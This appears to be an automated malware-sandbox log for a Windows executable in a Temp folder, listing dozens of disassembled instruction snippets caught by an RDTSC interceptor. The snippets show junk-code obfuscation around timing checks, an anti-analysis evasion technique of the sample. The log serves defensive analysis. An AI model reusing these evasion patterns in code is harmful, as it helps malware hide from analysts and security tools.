Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0E50 second address: 4EB0E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDCFD22A7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0E6B second address: 4EB0E9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7FDD3F186Dh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0D1C second address: 4EA0DEB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7FDCFD22A5h 0x00000008 or esi, 6A99EB36h 0x0000000e jmp 00007F7FDCFD22A1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov dl, cl 0x0000001b call 00007F7FDCFD22A9h 0x00000020 pushfd 0x00000021 jmp 00007F7FDCFD22A0h 0x00000026 and si, CCB8h 0x0000002b jmp 00007F7FDCFD229Bh 0x00000030 popfd 0x00000031 pop esi 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F7FDCFD22A4h 0x0000003b jmp 00007F7FDCFD22A5h 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007F7FDCFD22A0h 0x00000047 adc cl, 00000078h 0x0000004a jmp 00007F7FDCFD229Bh 0x0000004f popfd 0x00000050 popad 0x00000051 xchg eax, ebp 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 mov edi, 71045366h 0x0000005a movsx edi, cx 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0DEB second address: 4EA0E1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7FDD3F186Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0E1E second address: 4EA0E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, ABh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0E25 second address: 4EA0E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0E2B second address: 4EA0E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EF0034 second address: 4EF0050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7FDD3F1873h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EF0050 second address: 4EF00EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5E344AEAh 0x00000008 mov edi, 56842BB6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007F7FDCFD229Ch 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov cl, 9Dh 0x0000001a pushfd 0x0000001b jmp 00007F7FDCFD22A3h 0x00000020 and esi, 4E2D58EEh 0x00000026 jmp 00007F7FDCFD22A9h 0x0000002b popfd 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 push ecx 0x00000031 mov ebx, 08BBE64Eh 0x00000036 pop edx 0x00000037 pushfd 0x00000038 jmp 00007F7FDCFD22A4h 0x0000003d xor cl, FFFFFF98h 0x00000040 jmp 00007F7FDCFD229Bh 0x00000045 popfd 0x00000046 popad 0x00000047 pop ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F7FDCFD22A0h 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EF00EA second address: 4EF00F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EF00F9 second address: 4EF00FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80160 second address: 4E80188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F7FDD3F1876h 0x0000000e push eax 0x0000000f pushad 0x00000010 movsx edi, cx 0x00000013 push eax 0x00000014 push edx 0x00000015 mov edx, esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80188 second address: 4E801F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F7FDCFD229Eh 0x0000000d mov ebp, esp 0x0000000f jmp 00007F7FDCFD22A0h 0x00000014 push dword ptr [ebp+04h] 0x00000017 jmp 00007F7FDCFD22A0h 0x0000001c push dword ptr [ebp+0Ch] 0x0000001f pushad 0x00000020 movzx eax, bx 0x00000023 jmp 00007F7FDCFD22A3h 0x00000028 popad 0x00000029 push dword ptr [ebp+08h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7FDCFD22A0h 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E801F5 second address: 4E801F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E801F9 second address: 4E801FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E801FF second address: 4E80205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80205 second address: 4E80209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80209 second address: 4E8020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA06BB second address: 4EA06C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA06C9 second address: 4EA06F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7FDD3F1876h 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov dx, si 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA05B3 second address: 4EA05BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA05BA second address: 4EA05ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F7FDD3F1872h 0x0000000f or eax, 0BD7F5F8h 0x00000015 jmp 00007F7FDD3F186Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d mov dx, si 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA05ED second address: 4EA0620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007F7FDCFD229Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7FDCFD22A7h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA03D4 second address: 4EA03DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0164 second address: 4EB016A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB016A second address: 4EB017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F186Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB017C second address: 4EB024B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7FDCFD22A6h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov ah, dh 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007F7FDCFD22A9h 0x0000001c and cx, 4316h 0x00000021 jmp 00007F7FDCFD22A1h 0x00000026 popfd 0x00000027 pop ecx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F7FDCFD22A7h 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F7FDCFD22A4h 0x00000038 xor cl, FFFFFF98h 0x0000003b jmp 00007F7FDCFD229Bh 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007F7FDCFD22A8h 0x00000047 adc cl, FFFFFFF8h 0x0000004a jmp 00007F7FDCFD229Bh 0x0000004f popfd 0x00000050 popad 0x00000051 pop ebp 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB024B second address: 4EB0251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0F14 second address: 4EE0F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov cl, dl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0F25 second address: 4EE0F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0F29 second address: 4EE0F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0F37 second address: 4EE0F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F186Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0F49 second address: 4EE0F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0F4D second address: 4EE0F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7FDD3F186Ah 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC023F second address: 4EC0245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC0245 second address: 4EC0249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC0249 second address: 4EC02CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7FDCFD22A6h 0x00000011 push eax 0x00000012 jmp 00007F7FDCFD229Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F7FDCFD22A6h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F7FDCFD229Dh 0x00000028 jmp 00007F7FDCFD229Bh 0x0000002d popfd 0x0000002e call 00007F7FDCFD22A8h 0x00000033 pop esi 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC02CD second address: 4EC02D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC02D3 second address: 4EC02D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA04F0 second address: 4EA04F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA04F4 second address: 4EA04FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA04FA second address: 4EA0542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7FDD3F1879h 0x00000009 add ecx, 1D040D06h 0x0000000f jmp 00007F7FDD3F1871h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7FDD3F186Dh 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0542 second address: 4EA056E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7FDCFD229Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA056E second address: 4EA0572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0572 second address: 4EA0578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0578 second address: 4EA057E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA057E second address: 4EA0582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC0053 second address: 4EC0062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC0062 second address: 4EC0068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC0068 second address: 4EC006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC006C second address: 4EC00F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7FDCFD229Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F7FDCFD229Eh 0x00000016 and cx, F338h 0x0000001b jmp 00007F7FDCFD229Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F7FDCFD22A8h 0x00000027 sbb ch, FFFFFF98h 0x0000002a jmp 00007F7FDCFD229Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushfd 0x00000037 jmp 00007F7FDCFD22A2h 0x0000003c xor eax, 539997F8h 0x00000042 jmp 00007F7FDCFD229Bh 0x00000047 popfd 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC00F8 second address: 4EC0159 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7FDD3F1878h 0x00000008 sbb esi, 7B007258h 0x0000000e jmp 00007F7FDD3F186Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ch, 7Bh 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F7FDD3F1878h 0x00000023 sbb si, 03E8h 0x00000028 jmp 00007F7FDD3F186Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EC0159 second address: 4EC015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0585 second address: 4EE05BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7FDD3F1878h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE05BF second address: 4EE05CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE05CE second address: 4EE0628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7FDD3F1871h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cl, bh 0x00000015 pushfd 0x00000016 jmp 00007F7FDD3F1874h 0x0000001b xor al, FFFFFFF8h 0x0000001e jmp 00007F7FDD3F186Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0628 second address: 4EE06B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7FDCFD229Eh 0x00000010 xchg eax, ecx 0x00000011 jmp 00007F7FDCFD22A0h 0x00000016 push eax 0x00000017 pushad 0x00000018 call 00007F7FDCFD22A1h 0x0000001d pop edi 0x0000001e mov dx, ax 0x00000021 popad 0x00000022 xchg eax, ecx 0x00000023 jmp 00007F7FDCFD22A6h 0x00000028 mov eax, dword ptr [774365FCh] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F7FDCFD22A7h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE06B3 second address: 4EE0781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7FDD3F1872h 0x00000009 adc si, 16D8h 0x0000000e jmp 00007F7FDD3F186Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test eax, eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7FDD3F1874h 0x00000020 adc eax, 0285E138h 0x00000026 jmp 00007F7FDD3F186Bh 0x0000002b popfd 0x0000002c call 00007F7FDD3F1878h 0x00000031 pushfd 0x00000032 jmp 00007F7FDD3F1872h 0x00000037 xor al, FFFFFFC8h 0x0000003a jmp 00007F7FDD3F186Bh 0x0000003f popfd 0x00000040 pop ecx 0x00000041 popad 0x00000042 je 00007F804F8C4A89h 0x00000048 pushad 0x00000049 call 00007F7FDD3F1875h 0x0000004e mov esi, 400F6527h 0x00000053 pop eax 0x00000054 mov edi, 104FA940h 0x00000059 popad 0x0000005a mov ecx, eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F7FDD3F1872h 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0781 second address: 4EE0787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE0787 second address: 4EE078B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE078B second address: 4EE07F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c call 00007F7FDCFD22A4h 0x00000011 mov cx, 6001h 0x00000015 pop ecx 0x00000016 pushfd 0x00000017 jmp 00007F7FDCFD22A7h 0x0000001c adc eax, 14D0212Eh 0x00000022 jmp 00007F7FDCFD22A9h 0x00000027 popfd 0x00000028 popad 0x00000029 and ecx, 1Fh 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE07F2 second address: 4EE07F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE07F6 second address: 4EE07FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE07FC second address: 4EE084D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7FDD3F1870h 0x00000009 or ax, A9D8h 0x0000000e jmp 00007F7FDD3F186Bh 0x00000013 popfd 0x00000014 call 00007F7FDD3F1878h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d ror eax, cl 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7FDD3F186Ch 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE084D second address: 4EE08B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b call 00007F7FDCFD22A4h 0x00000010 pushfd 0x00000011 jmp 00007F7FDCFD22A2h 0x00000016 sbb ax, 98F8h 0x0000001b jmp 00007F7FDCFD229Bh 0x00000020 popfd 0x00000021 pop ecx 0x00000022 popad 0x00000023 retn 0004h 0x00000026 nop 0x00000027 mov esi, eax 0x00000029 lea eax, dword ptr [ebp-08h] 0x0000002c xor esi, dword ptr [00152014h] 0x00000032 push eax 0x00000033 push eax 0x00000034 push eax 0x00000035 lea eax, dword ptr [ebp-10h] 0x00000038 push eax 0x00000039 call 00007F7FE1DA2B61h 0x0000003e push FFFFFFFEh 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F7FDCFD22A1h 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EE08B0 second address: 4EE08EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 2FA130E9h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jmp 00007F7FDD3F1874h 0x00000011 ret 0x00000012 nop 0x00000013 push eax 0x00000014 call 00007F7FE21C2160h 0x00000019 mov edi, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7FDD3F1877h 0x00000022 rdtsc
